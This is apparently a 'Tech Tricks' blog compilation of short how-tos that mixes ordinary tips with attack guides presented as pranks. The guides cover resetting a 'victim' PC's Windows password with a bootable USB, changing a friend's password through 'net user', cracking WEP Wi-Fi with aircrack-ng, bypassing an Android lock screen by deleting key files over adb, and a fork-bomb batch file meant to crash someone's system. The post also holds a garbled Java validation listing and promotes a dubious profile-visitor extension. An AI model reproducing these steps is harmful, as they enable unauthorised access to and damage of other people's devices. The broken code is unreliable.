Check Who Visited Your Facebook Profile

It has always been a concern of social network users to check who visits their profile. Tech Tricks brings you another trick by which you can trick your way into Facebook and know who visits your profile.

This way is by using an extension Facebook Flat that is available for chrome.
You just have to add that extension into chrome and after that you can check who visited your profile.
Extension Link is given below for your ease.


1 . Add your extension to chrome by clicking here.
2.  Now turn your extension on and visit Facebook.
3. Now you can see an option of profile visitors.
4. Click on it and you can see who visited your profile.
Facebook flat



Make Your Compute Shutdown Later Automatically

There are times when you want Window to shutdown your device automatically after a specific countdown. Windows has not provided this feature yet. But, by a simple way, you can totally trick your way into to shuting down your PC/laptop at specific time automatically.


1. Right click on my desktop
2. Select 'New'. Then select 'Shortcut'.
Shutdown PC

3. You will be prompted with a window containing this message:
 “What item would you like to create a shortcut for?”
4. Enter the following line into the dialog box:
   'shutdown -s -t 600'
    60 seconds mean 1 minute. So, 600 seconds means 10 minutes. Set it according to your requirement.
5. Click 'Next' and then save the file on whatever destination you like. 

6. Now, all you need to do is to open the shortcut you created and the shutdown's countdown will start. A notification will show up confirming that you have followed the procedure properly and would confirm this trick is going to work.

Easily Install Custom Recovery in Android with Rom Manager

Rom Manager
Rom Manager is an app that can help you to install custom recovery mod in your android easily. Just a click and done you have install custom recovery.

Required Things


2. Open it and click on recovery step

3. Select Recovery Mod you want to download and install
4. Wait for download and than restart





Root Any Android By One Click 

Shutdown PC Forever


This piece of code can shutdown your PC forever so be careful. Don't run it until you know what you are up to. Run this code if and only if you want a sudden death of your PC.

Enable/Disable Administrators without password using CMD

On Windows, sometimes, people are bothered when they see multiple administrators.

People are often confused among them because they don't know which administrator account was used last time and which one contains the user data they need to access.

Following method disables an unwanted administrator:

Step 1:

Open cmd in administrator privilege by right clicking it and choosing Run as Administrator.

Step 2:

Type 'net user' (without apostrophes). This will display all the users which are available on your Windows.

Step 3:

Now if there are 2 or more administrators, simply write this line to disable any one of them.
e.g Helen is the administrator you want to disable.
'net user Helen /active:no'.

The unwanted administrator account is now disabled.

If you want to enable that account which you disabled, type 'net user Helen /active:yes' if you want to re-enable the administrator account you disabled.

Break Windows Password with USB

Lazesoft is a popular software to crack or recover windows password with help of bootable usb.
Now you can simply recover your password or break someone password for prank by just making a bootable usb and by plugging it into victim computer

Step :

1.Download and install Lazesoft by link Given at download Section
2. Simply install it in your pc.
3. Now make Bootable Usb by clicking on burn usb it could take some time so be patient
Lazesoft Burn Usb

4. Now Your Usb is ready to crack windows password
5. Plug in usb into the victim computer
6. restart/start computer
7. Enter Into boot menu
8. click on recover password
9. select user
lazesoft select user

10. click on reset the password
Lazesoft Reset password

11. Restart laptop and Account is password free.




Only for eductional purpose

Run Multiple Virtual Operating System Using Vmware

Here You can learn to run different or multiple operating System by using VMware workstation.
VMware is software that help you to run multiple Operating system within your operating system.


Steps to use VMware:

1.Download and install VMware
2.Click on Create a new virtual machine
3.Click On next
4.Select iso as show in picture below and click next
vmware Iso select

5.Select os according to your iso operating system file.
vmware select os
6.Select location of os you want to install and click next
7.Select size and click next
vmware select size
8. Click Next and finish

Video to use Vmware

Download VMware

Direct Download 

Torrent Download

Magnet Download

Root Any Android By One Click Using kingoRoot

Kingo Root
A simple way to root your android by using a simple software kingo root. You just have to download the software and click a button and wait .
Even A person who know nothing about rooting a phone can do it. Seriously this software make it that simple . 
You are not believing me ...? No problem in a second you will knew i was saying nothing but truth.

Things Required

1.Android Phone With debugging Enabled
3. Phone Should be attached with computer


1. Download and install  Kingo root  (Link Given Below)
2. Attach your mobile with debugging enabled with computer.
            You can enabled debugging by going into Setting -> developers
3.Open Kingo Root and wait to connect
4. click on root
5. Done


Download Link


Hack Android Games Using Game Killer

Game Killer

You are here because you are fed up to play by the rules of games. So, what you need to do is to hack it so that you can play it by rules that you devise. For this purpose, just follow the given steps and you are good to go.

Things Required to hack Android Games

1. Rooted Android Phone

Steps To Hack Android Game

Use of Game Killer

1. Download and install Game Killer .apk in your rooted phone.
2. Open Game Killer app.
3. Now an icon appears. Open the game you want to hack.
4. Enter current number of Coins etc, which you want to change. Some results would show on your screen but to be specific, play the game 1 or 2 times and then enter new amount so it can be specific.
5. Change the amount.

Finally, you have hacked your way into whatever game you are playing. Enjoy your game.


Game Killer Download Link

Download Game Killer

Change Window Password Using Cmd

Password Change with cmd

Let your friend is using his/her computer/laptop in front of you and for a short period of time he goes away leaving his laptop on, what can you do? 
You can prank him by changing his password but you guys were thinking that for changing password you have to know the old one. Well it is true but not completely. 
There are some flaws in Windows that can help you play this prank. In short you can change password without using the old one.

These Are the steps by which you can change password without using old password with help of CMD.

Steps to Change Password Using Cmd

1. Run cmd as administrator
2. type 'Net User'
                     List of users show below after writing net user as shown in picture below.
List of users using net user

3. Now type 'net user name *'
Replace username with username  you want to change password.
In this case
                                                               Net User Hadi *

Change username password using net user

As shown in picture, we didn't require old password

4.Type a new password and done your friend password is change.

While typing new password you can't see it on screen but don't worry it is happening.

Crack Wifi Password (WEP) with Kali Linux

wep hack

We can easily crack Wifi (WEP security) by using Kali Linux in approximately 10-15 min by following these steps give below.

Open terminal and follow the following procedure to hack into any laptop


1. Find out the name of your wireless adapter by typing:

2. Enable Monitor mode by typing:
    airmon-ng start wlan0

3. Start capturing packets by typing:
    airodump-ng mon0

4. Store the captured packets in a file by typing:
    airodump-ng mon0 --write name_of_file

5. Crack the wifi after 10000 packets minimum by typing:
    aircrack-ng name_of_file-01.cap

1.Only wep type wifi password can cracked using these step.
2. If you have any problem comment below.

Bypassing Android Lock Screen using Linux

Linux Terminal and adb tools

 What You Need:

  1. A computer running a Linux distro or Windows+Cygwin
  2. USB cable to connect your phone to the PC
  3. Adb installed

How to install adb:

  1. Open Terminal
  2. Type:
    'sudo apt-get install android-tools-adb'
  3. Hit [Enter] and follow the instructions until everything is installed.


  1. Connect you (turned on) Phone to the Computer via USB.
  2. Open a terminal window.
  3. Type:
    adb devices
    adb shell
    cd data/system
    rm *.key
  4. Reboot your system.

If you followed the steps properly, you have successfully bypassed android lock screen.

Note: Do not use this trick to trespass someone's privacy which is considered a punishable crime.

Validation System in java

Validate System in java
This code is written in java and it is about the validation system.
1. Name Should be 2 or 3 words, first letter of every word should be Capital.
2. Phone No: Should be of length 9 or 10 followed to +92 in every case.
3. Username: any combination of letter with only dot (.) as special character be allowed
4. Password: of length 4-11. with at least one upper case letter, one lower case, one digit and one special character.

It won't move to next case until you enter the current case correctly.

import java.util.*;

public class validateinfo
int p_check[]=new int[4];
String name,username,password,phone;
int i=-1,n_count=1,check_n=0,f_check=0;
Scanner s=new Scanner(;
public static void main(String args[])
validateinfo v=new validateinfo();;
System.out.println(" -------------------Input Complete-----------------------------");

public void name()
System.out.println("\nEnter Name=");
if(name.charAt(i)==' ')
System.out.println("\t\t\tInvalid Input\n");
System.out.println("\nName Should be 2 or 3 words, first letter of every word should be capital\n\n\t\t\tEnter Again");
public void number()
System.out.println("\nEnter Phone Number=");
System.out.println("\t\t\tInvalid Input\n");
System.out.println("\nPhone No: Should be of length 9 or 10 followed to +92 in every case. \n\n\t\t\tEnter Again\n");
public void username()
System.out.println("\nEnter UserName=");
System.out.println("\nUsername: any combination of letter with only dot (.) as special character be allowed\n\n\t\t\tEnter Again\n");
System.out.println("\t\t\tInvalid Input\n");
System.out.println("\nUsername: any combination of letter with only dot (.) as special character be allowed\n\n\t\t\tEnter Again\n");
public void password()
Arrays.fill(p_check, 0);
System.out.println("\nEnter Password=");
else if(password.charAt(i)>=97&&password.charAt(i)<=122)
else if(password.charAt(i)>=48&&password.charAt(i)<=57)
System.out.println("\t\t\tInvalid Input\n");
System.out.println("Password: of length 4-11. with at least one upper case letter, one lower case, one digit and one special character\n\n\t\t\tEnter Again\n\n");
System.out.println("\t\t\tInvalid Input\n");
System.out.println("Password: of length 4-11. with at least one upper case letter, one lower case, one digit and one special character\n\n\t\t\tEnter Again\n\n");



Crash Your Friend System With Little Trick


Ever heard of techniques used for crash PCs?
Little viruses overloading the processor and hindering all the under-process data, leading to
Here You will learn a trick using batch programming to crash a system.
You can use it to prank with your friend.
It open infinite number of CMD that make your PC/laptop slow until your ram is full and crash the system


  1. Open Notepad
  2. Copy This Code and paste it in notepad
    :1Startgoto 1
  3. Save File As Name.bat
  4. Run it

Hide Your Message in Image with Simple Trick

Hidden messages sound fascinating. Trying to deliver some hidden message?

Tech Tricks brings you an easy way to convey hidden message using Images.

Method is simple and comprises of following steps:

  1. Copy any Image to your C: directory.
  2. Open cmd by going Start-Run program- type 'cmd'. (Open the Administrative mode.)
  3. Type cd\ and press enter.
  4. Now type the following command:
    echo “your text to hide” >> image.jpg

    ("Your text to hide" is the message you want to convey and "image.jpg" is the name of image.)

To read the message hidden in an image, open the image in notepad. The hidden text would be visible.